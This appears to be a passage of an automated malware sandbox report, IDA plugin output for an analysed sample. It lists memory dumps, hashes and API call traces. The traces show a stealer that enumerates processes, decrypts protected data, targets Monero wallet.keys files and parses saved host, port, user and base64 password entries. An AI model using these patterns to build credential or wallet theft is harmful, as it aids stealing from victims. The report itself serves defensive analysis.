                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 90380aab1d4bdca929f29b1d34d9761af54a59b3a2b95f5dd4f7bcf363667341
                              • Instruction ID: 217bee468a3dff8c881b85bd662d22f4a0a72ca603164afe26c927d72a4e40ea
                              • Opcode Fuzzy Hash: 90380aab1d4bdca929f29b1d34d9761af54a59b3a2b95f5dd4f7bcf363667341
                              • Instruction Fuzzy Hash: 9201E9B5A00208ABCB14DFA5C948BEDB7F8FB58300F10818AE94AD6280DB749A41CF91
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ,*w$1P_d$fgj$u/?n
                              • API String ID: 0-3981488543
                              • Opcode ID: 5223fe923dc9b4427c25a5eb8981b04538b621a0de107cdd3283eb2a44b5f183
                              • Instruction ID: 19cddadc8b3015579e45996876ed5fdd69f1f2df408cb5c52e13b5e1ac20d20a
                              • Opcode Fuzzy Hash: 5223fe923dc9b4427c25a5eb8981b04538b621a0de107cdd3283eb2a44b5f183
                              • Instruction Fuzzy Hash: EAB238F3A082049FE3046E2DEC8577ABBE9EF94360F1A853DEAC4C7744E93558058696
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008705B7), ref: 008686CA
                              • Process32First.KERNEL32(?,00000128), ref: 008686DE
                              • Process32Next.KERNEL32(?,00000128), ref: 008686F3
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • CloseHandle.KERNEL32(?), ref: 00868761
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: bc537ad5771eaf457c0701775dc59a9454ed48070e488b5eac103f93f3632e0d
                              • Instruction ID: 699ed352cb0cd6ef736cae6c3e98cabb62e6174587219529c60a17b5309e6cad
                              • Opcode Fuzzy Hash: bc537ad5771eaf457c0701775dc59a9454ed48070e488b5eac103f93f3632e0d
                              • Instruction Fuzzy Hash: 12313C71901218EBCB28DF98DC45FEEB778FB55700F1141AAA50AF61A0DF346A45CFA2
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00855184,40000001,00000000,00000000,?,00855184), ref: 00868EC0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 452a4b60ff7015cdf05b949ce6813d13645c508aae7ddd992d9e829418081809
                              • Instruction ID: d21c220d4a8f4c6e0ee2cb56cf43cd738428e70f0ae8b5970f25039701f4e276
                              • Opcode Fuzzy Hash: 452a4b60ff7015cdf05b949ce6813d13645c508aae7ddd992d9e829418081809
                              • Instruction Fuzzy Hash: 83110674200208EFDB00CFA4E885FAA37A9FF89304F109649F919CB250DB35E841DB60
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00854EEE,00000000,?), ref: 00859B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859B2A
                              • LocalFree.KERNEL32(?,?,?,?,00854EEE,00000000,?), ref: 00859B3F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: f89af8047f156d3a5af7ffe5b94651ed4494b0cf62391327071926eb3a1e74bf
                              • Instruction ID: b65a4ab74db0699e54d2ae2f9cf18d03253fdf945f70f7486fdca0d0250c4bb8
                              • Opcode Fuzzy Hash: f89af8047f156d3a5af7ffe5b94651ed4494b0cf62391327071926eb3a1e74bf
                              • Instruction Fuzzy Hash: 8D11A4B4240208EFEB10CFA4DC95FAA77B5FB89711F208059FD199B390CB75A901CB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00870E00,00000000,?), ref: 008679B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008679B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00870E00,00000000,?), ref: 008679C4
                              • wsprintfA.USER32 ref: 008679F3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: d9da66257da71cd2c3c5263a9697000ecfa2e00bb9d5f5b7f4d0273e8a54c846
                              • Instruction ID: a120bd2bad6ece39b6ba1841a22db09cfc5d41037037b02a771bedb62be0258d
                              • Opcode Fuzzy Hash: d9da66257da71cd2c3c5263a9697000ecfa2e00bb9d5f5b7f4d0273e8a54c846
                              • Instruction Fuzzy Hash: 31112AB2A04118ABCB14DFC9DD45BBEB7F8FB4CB11F10415AF605A2280D6395941C7B1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015CDFA0,00000000,?,00870E10,00000000,?,00000000,00000000), ref: 00867A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00867A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015CDFA0,00000000,?,00870E10,00000000,?,00000000,00000000,?), ref: 00867A7D
                              • wsprintfA.USER32 ref: 00867AB7
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 2b175f18f82b8b7512816c8aa9d0df58bc8b37a901fba3262c0afdbbfe60554f
                              • Instruction ID: 36a7964cbff2105b5dfa8bec3079ab7884d864287929abe946edd67e2eb6d38e
                              • Opcode Fuzzy Hash: 2b175f18f82b8b7512816c8aa9d0df58bc8b37a901fba3262c0afdbbfe60554f
                              • Instruction Fuzzy Hash: D2117CB1A45228EBEB20CB94DC49FA9B778FB04721F1042DAE91A932C0CB745A40CF91
                              APIs
                              • CoCreateInstance.COMBASE(0086E118,00000000,00000001,0086E108,00000000), ref: 00863758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008637B0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 039df4665b2edb0b5f4021b1819525a3e226a6dbeec755413e335076242723df
                              • Instruction ID: e9028a30115f062252acf3e676357699c35ec54dc79c80515deb8ac3599e4e96
                              • Opcode Fuzzy Hash: 039df4665b2edb0b5f4021b1819525a3e226a6dbeec755413e335076242723df
                              • Instruction Fuzzy Hash: 38410670A00A289FDB24DB58CC85BDBB7B4FB48302F4041D9A608E72D0E7716E85CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00859B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00859BA3
                              • LocalFree.KERNEL32(?), ref: 00859BD3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 07j9$B.K
                              • API String ID: 0-1843767294
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =$ =
                              • API String ID: 0-2912459995
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 10Oo$N.g#
                              • API String ID: 0-3840764527
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: z3}
                              • API String ID: 0-3258677349
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 5m
                              • API String ID: 0-2377321039
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b969d7e382f412cdebdd3e79fe1113ed28387b7274d74bbc44bb8b4332840b53
                              • Instruction ID: aae43e59f962cb5c86d698195e41c9d1f4547603b166545af4eaf65428509745
                              • Opcode Fuzzy Hash: b969d7e382f412cdebdd3e79fe1113ed28387b7274d74bbc44bb8b4332840b53
                              • Instruction Fuzzy Hash: D741F0F3A483144BF3046E39EDC937ABAD5EB54720F1B063DEAD5837C0E97959148286
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 00868DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00868E0B
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                                • Part of subcall function 008599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                                • Part of subcall function 008599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                                • Part of subcall function 008599C0: ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                                • Part of subcall function 008599C0: LocalFree.KERNEL32(0085148F), ref: 00859A90
                                • Part of subcall function 008599C0: CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                                • Part of subcall function 00868E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00868E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00870DBA,00870DB7,00870DB6,00870DB3), ref: 00860362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00860369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00860385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 00860393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 008603CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 008603DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00860419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 00860427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00860463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 00860475
